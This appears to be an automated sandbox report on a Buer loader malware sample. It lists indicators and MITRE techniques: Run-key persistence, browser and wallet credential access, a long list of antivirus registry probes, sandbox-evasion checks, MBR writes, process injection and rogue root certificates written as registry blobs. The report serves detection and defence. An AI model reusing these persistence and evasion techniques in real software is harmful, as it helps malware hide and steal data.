buer | a546a1f257585e2f4c093db2b7eeb6413a314ffb1296d97fd31d0363e827cc65

System Information Discovery

Processes:

7028980.77

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7028980.77
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7028980.77

Drops startup file 1 IoCs

Processes:

7028980.77

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	7028980.77

Loads dropped DLL 3 IoCs

Processes:

MsiExec.exe4743103.522cyz23u2nve.tmp

pid	Process
3616	MsiExec.exe
4036	4743103.52
4576	2cyz23u2nve.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

themida 3 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/files/0x000100000001abd7-143.dat	themida
behavioral2/files/0x000100000001abd7-144.dat	themida
behavioral2/memory/2204-175-0x0000000000200000-0x0000000000201000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

multitimer.exe5930241.65gcttt.exe7028980.77

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fo3mha1p041 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\33N4J37VE0\\multitimer.exe\" 1 3.1615014596.60432ac408364"	multitimer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	5930241.65
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gcttt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\7028980.77"	7028980.77

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

Processes:

md2_2efs.exe7028980.77

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7028980.77

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

msiexec.exemsiexec.exe

description	ioc	Process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 20 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
582	ipinfo.io
652	ipinfo.io
190	ipinfo.io
309	ipinfo.io
323	ipinfo.io
381	ip-api.com
474	ipinfo.io
477	ipinfo.io
85	ip-api.com
110	ipinfo.io
549	ipinfo.io
623	ipinfo.io
692	ip-api.com
730	checkip.amazonaws.com
113	ipinfo.io
255	ipinfo.io
554	checkip.amazonaws.com
625	ipinfo.io
23	api.ipify.org
187	checkip.amazonaws.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

multitimer.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

Setup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exe

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Setup.exe7028980.77

pid	Process
400	Setup.exe
2204	7028980.77

Suspicious use of SetThreadContext 4 IoCs

Processes:

615F.tmp.exeC0CA61A12E4C8B38.exe

description	pid	Process	procid_target
PID 2096 set thread context of 4000	2096	615F.tmp.exe	82
PID 904 set thread context of 1924	904	C0CA61A12E4C8B38.exe	106
PID 904 set thread context of 5092	904	C0CA61A12E4C8B38.exe	112
PID 904 set thread context of 4940	904	C0CA61A12E4C8B38.exe	116

Drops file in Windows directory 2 IoCs

Processes:

multitimer.exe

description	ioc	Process
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 16 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
6048	4644	WerFault.exe	128
4436	4644	WerFault.exe	128
4548	4644	WerFault.exe	128
3932	4644	WerFault.exe	128
5992	4644	WerFault.exe	128
6440	4644	WerFault.exe	128
6608	4644	WerFault.exe	128
5012	6572	WerFault.exe	313
6988	6572	WerFault.exe	313
5196	6572	WerFault.exe	313
6220	6572	WerFault.exe	313
5132	6572	WerFault.exe	313
5064	6572	WerFault.exe	313
4928	6572	WerFault.exe	313
7824	5460	WerFault.exe	384
8208	7952	WerFault.exe	418

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

C0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

615F.tmp.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	615F.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	615F.tmp.exe

Delays execution with timeout.exe 4 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid	Process
1232	timeout.exe
4936	timeout.exe
7192	timeout.exe
4388	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

multitimer.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exeTASKKILL.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
3520	taskkill.exe
5728	taskkill.exe
3472	taskkill.exe
2148	taskkill.exe
5916	TASKKILL.exe
5772	taskkill.exe
6852	taskkill.exe
6872	taskkill.exe
11156	taskkill.exe

Modifies data under HKEY_USERS 1 IoCs

Processes:

file.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

file.exeSetup.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid	Process
5744	regedit.exe
6552	regedit.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid	Process
3236	PING.EXE
1464	PING.EXE
4332	PING.EXE
1512	PING.EXE

Script User-Agent 12 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	624	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	111	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	253	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	322	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	475	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	548	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	581	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	650	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	116	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	189	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	308	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	482	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

file.exe615F.tmp.exe1615014376668.exe1615014381668.exemultitimer.exe

pid	Process
3224	file.exe
3224	file.exe
3224	file.exe
3224	file.exe
3224	file.exe
3224	file.exe
3224	file.exe
3224	file.exe
4000	615F.tmp.exe
4000	615F.tmp.exe
3876	1615014376668.exe
3876	1615014376668.exe
1000	1615014381668.exe
1000	1615014381668.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

file.exemsiexec.exemsiexec.exe

description	pid	Process
Token: SeDebugPrivilege	3224	file.exe
Token: SeShutdownPrivilege	2916	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2916	msiexec.exe
Token: SeSecurityPrivilege	512	msiexec.exe
Token: SeCreateTokenPrivilege	2916	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2916	msiexec.exe
Token: SeLockMemoryPrivilege	2916	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2916	msiexec.exe
Token: SeMachineAccountPrivilege	2916	msiexec.exe
